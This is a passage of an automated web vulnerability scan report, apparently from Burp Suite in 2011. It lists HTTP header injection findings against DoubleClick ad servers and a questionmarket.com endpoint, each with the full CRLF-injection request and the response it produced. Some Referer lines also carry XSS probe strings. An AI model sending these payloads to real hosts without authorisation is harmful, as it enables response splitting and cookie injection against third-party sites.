User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/77f38
49cfd0de220
/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.19. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.25 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.6483.MENSHEALTH/B5295230.25

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84bba%0d%0a3dbcb4b9585 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84bba%0d%0a3dbcb4b9585/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84bba
3dbcb4b9585
/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.20. http://ad.doubleclick.net/ad/N6357.menshealth.comOX4549/B4645123.52 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6357.menshealth.comOX4549/B4645123.52

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3c2b9%0d%0a6d4346a60d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3c2b9%0d%0a6d4346a60d9/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3c2b9
6d4346a60d9
/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:42:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.21. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d03d%0d%0a4b47254b0af was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6d03d%0d%0a4b47254b0af/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6d03d
4b47254b0af
/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 10 Mar 2011 16:45:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.22. http://ad.doubleclick.net/adj/bicycling/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bicycling/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c73c%0d%0a2b896a07724 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c73c%0d%0a2b896a07724/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c73c
2b896a07724
/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1:
Date: Thu, 10 Mar 2011 16:40:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.23. http://ad.doubleclick.net/adj/menshealth/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/menshealth/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7fb28%0d%0a5d755171d05 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7fb28%0d%0a5d755171d05/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7fb28
5d755171d05
/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5:
Date: Thu, 10 Mar 2011 16:40:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.24. http://ad.doubleclick.net/adj/organicgardening/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/organicgardening/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c10d%0d%0ab8b8b321907 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c10d%0d%0ab8b8b321907/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.organicgardening.com/?cm_sp=Network%20Banner-_-OG-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c10d
b8b8b321907
/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5:
Date: Thu, 10 Mar 2011 16:45:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.25. http://ad.doubleclick.net/adj/prevention/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/prevention/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3a618%0d%0abf6e70eb76b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3a618%0d%0abf6e70eb76b/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3a618
bf6e70eb76b
/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130:
Date: Thu, 10 Mar 2011 16:40:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.26. http://ad.doubleclick.net/adj/prevention/lifelongbeauty [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/prevention/lifelongbeauty

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11bac%0d%0acea0052660f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11bac%0d%0acea0052660f/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11bac
cea0052660f
/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100:
Date: Thu, 10 Mar 2011 22:23:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.27. http://ad.doubleclick.net/adj/rodale/fitness [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rodale/fitness

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62f9f%0d%0a36bce5cafc7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62f9f%0d%0a36bce5cafc7/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.rodale.com/benefits-walking?4bec2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eec68e81f22b=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62f9f
36bce5cafc7
/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120:
Date: Thu, 10 Mar 2011 22:18:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://ad.doubleclick.net/adj/runnersworld/community [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/runnersworld/community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89a70%0d%0a4a192a08534 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89a70%0d%0a4a192a08534/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/89a70
4a192a08534
/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540:
Date: Thu, 10 Mar 2011 22:19:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.29. http://ad.doubleclick.net/adj/runnersworld/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/runnersworld/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 113c7%0d%0a6798c3251f0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /113c7%0d%0a6798c3251f0/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/113c7
6798c3251f0
/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700:
Date: Thu, 10 Mar 2011 16:40:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.30. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3b862%0d%0a8ca34c13755 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif3b862%0d%0a8ca34c13755?8285523 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif3b862
8ca34c13755
:
Date: Thu, 10 Mar 2011 16:42:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.31. http://ad.doubleclick.net/imp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /imp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5fcd0%0d%0af26994b0bbc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5fcd0%0d%0af26994b0bbc;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g%3fhttp://s0.2mdn.net/2521530/2017187_menopause_1.jpg HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5fcd0
f26994b0bbc
;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g:
Date: Thu, 10 Mar 2011 16:40:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.32. http://amch.questionmarket.com/adsc/d876089/3/885674/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/3/885674/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload b94cd%0d%0a0acdc94cdfa was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/3/885674/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5Bb94cd%0d%0a0acdc94cdfa

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 16:43:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:43:12 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885674-3-1; expires=Mon, 30-Apr-2012 08:43:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5Bb94cd
0acdc94cdfa
_876089-4k:xM-0; expires=Mon, 30-Apr-2012 08:43:13 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.33. http://amch.questionmarket.com/adsc/d876089/3/885678/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/3/885678/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload da28e%0d%0af59a7dd42e was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/3/885678/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=da28e%0d%0af59a7dd42e

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 16:43:11 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:43:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885678-3-1; expires=Mon, 30-Apr-2012 08:43:11 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=da28e
f59a7dd42e
_876089-2k:xM-0; expires=Mon, 30-Apr-2012 08:43:11 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

